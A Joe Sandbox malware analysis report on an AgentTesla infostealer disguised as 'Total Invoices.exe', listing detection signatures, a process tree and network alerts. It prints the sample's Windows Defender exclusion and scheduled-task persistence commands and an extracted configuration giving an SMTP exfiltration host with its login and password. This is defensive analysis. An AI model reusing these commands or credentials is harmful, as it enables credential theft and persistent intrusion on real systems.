Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Total Invoices.exe

Overview

General Information

Sample name:Total Invoices.exe
Analysis ID:1430700
MD5:cd3c05ebb9a3fca7aa748f522559b1ea
SHA1:43dc8cdf47186a54dc38cd86450aca6f6361a9b4
SHA256:c96565623c3e405a370614f452383a763f5a48baf25e79f91a6311c9a0a8fd3a
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Total Invoices.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\Total Invoices.exe" MD5: CD3C05EBB9A3FCA7AA748F522559B1EA)
    • powershell.exe (PID: 7148 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7536 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7196 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7372 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • dWXyZYb.exe (PID: 7480 cmdline: C:\Users\user\AppData\Roaming\dWXyZYb.exe MD5: CD3C05EBB9A3FCA7AA748F522559B1EA)
    • schtasks.exe (PID: 7720 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • GUIVTme.exe (PID: 7964 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • GUIVTme.exe (PID: 7224 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.unitechautomations.com", "Username": "design@unitechautomations.com", "Password": "Unitech@123"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000D.00000002.2882242292.0000000002891000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000008.00000002.1804990629.00000000030BA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0000000D.00000002.2882242292.0000000002899000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 19 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  8.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x33b64:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x33bd6:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x33c60:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x33cf2:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x33d5c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x33dce:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x33e64:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x33ef4:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.Total Invoices.exe.4ebf748.10.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.2.Total Invoices.exe.4ebf748.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 22 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Total Invoices.exe", ParentImage: C:\Users\user\Desktop\Total Invoices.exe, ParentProcessId: 7088, ParentProcessName: Total Invoices.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", ProcessId: 7148, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7372, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GUIVTme
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Total Invoices.exe", ParentImage: C:\Users\user\Desktop\Total Invoices.exe, ParentProcessId: 7088, ParentProcessName: Total Invoices.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", ProcessId: 7148, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\dWXyZYb.exe, ParentImage: C:\Users\user\AppData\Roaming\dWXyZYb.exe, ParentProcessId: 7480, ParentProcessName: dWXyZYb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp", ProcessId: 7720, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.185.129.60, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7372, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Total Invoices.exe", ParentImage: C:\Users\user\Desktop\Total Invoices.exe, ParentProcessId: 7088, ParentProcessName: Total Invoices.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp", ProcessId: 7196, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Total Invoices.exe", ParentImage: C:\Users\user\Desktop\Total Invoices.exe, ParentProcessId: 7088, ParentProcessName: Total Invoices.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe", ProcessId: 7148, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Total Invoices.exe", ParentImage: C:\Users\user\Desktop\Total Invoices.exe, ParentProcessId: 7088, ParentProcessName: Total Invoices.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp", ProcessId: 7196, ProcessName: schtasks.exe

                      Snort Signatures

                      Timestamp:04/24/24-03:17:06.326829
                      SID:2839723
                      Source Port:49735
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-03:17:14.975638
                      SID:2839723
                      Source Port:49736
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-03:17:06.326829
                      SID:2030171
                      Source Port:49735
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-03:17:14.975638
                      SID:2851779
                      Source Port:49736
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-03:17:06.326860
                      SID:2840032
                      Source Port:49735
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-03:17:06.326860
                      SID:2855542
                      Source Port:49735
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-03:17:06.326860
                      SID:2855245
                      Source Port:49735
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-03:17:14.975638
                      SID:2840032
                      Source Port:49736
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-03:17:14.975638
                      SID:2030171
                      Source Port:49736
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-03:17:06.326860
                      SID:2851779
                      Source Port:49735
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-03:17:14.975638
                      SID:2855542
                      Source Port:49736
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-03:17:14.975638
                      SID:2855245
                      Source Port:49736
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.unitechautomations.com", "Username": "design@unitechautomations.com", "Password": "Unitech@123"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeReversingLabs: Detection: 60%
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeVirustotal: Detection: 31%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: Total Invoices.exeReversingLabs: Detection: 60%
                      Source: Total Invoices.exeVirustotal: Detection: 31%Perma Link
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: Total Invoices.exeJoe Sandbox ML: detected
                      Source: Total Invoices.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Total Invoices.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: RegSvcs.pdb, source: GUIVTme.exe, 0000000F.00000000.1828432542.00000000007B2000.00000002.00000001.01000000.0000000E.sdmp, GUIVTme.exe.8.dr
                      Source: Binary string: aDox.pdbSHA256 source: Total Invoices.exe, dWXyZYb.exe.0.dr
                      Source: Binary string: RegSvcs.pdb source: GUIVTme.exe, 0000000F.00000000.1828432542.00000000007B2000.00000002.00000001.01000000.0000000E.sdmp, GUIVTme.exe.8.dr
                      Source: Binary string: aDox.pdb source: Total Invoices.exe, dWXyZYb.exe.0.dr

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49735 -> 192.185.129.60:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49735 -> 192.185.129.60:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49735 -> 192.185.129.60:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49735 -> 192.185.129.60:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49735 -> 192.185.129.60:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.4:49735 -> 192.185.129.60:587
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49736 -> 192.185.129.60:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49736 -> 192.185.129.60:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49736 -> 192.185.129.60:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49736 -> 192.185.129.60:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49736 -> 192.185.129.60:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.4:49736 -> 192.185.129.60:587
                      Source: Joe Sandbox ViewIP Address: 192.185.129.60 192.185.129.60
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownDNS traffic detected: queries for: mail.unitechautomations.com
                      Source: RegSvcs.exe, 00000008.00000002.1804990629.00000000030BA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2882242292.0000000002899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.unitechautomations.com
                      Source: Total Invoices.exe, 00000000.00000002.1730336857.000000000335C000.00000004.00000800.00020000.00000000.sdmp, dWXyZYb.exe, 00000009.00000002.1825169792.0000000002FF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Total Invoices.exe, dWXyZYb.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: Total Invoices.exe, 00000000.00000002.1735865381.0000000005B39000.00000004.00000020.00020000.00000000.sdmp, Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: Total Invoices.exe, 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dWXyZYb.exe, 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, cPKWk.cs.Net Code: MPvOvSMQSR

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Total Invoices.exe.4ebf748.10.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.dWXyZYb.exe.4055278.10.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Total Invoices.exe.4efa768.11.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.dWXyZYb.exe.401a258.11.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Total Invoices.exe.4efa768.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.dWXyZYb.exe.4055278.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.dWXyZYb.exe.401a258.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      .NET source code contains very large array initializations
                      Source: 0.2.Total Invoices.exe.31a42d0.5.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
                      Source: 0.2.Total Invoices.exe.59b0000.13.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: Total Invoices.exe
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_015ED5DC0_2_015ED5DC
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07ADD63F0_2_07ADD63F
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07ADD6500_2_07ADD650
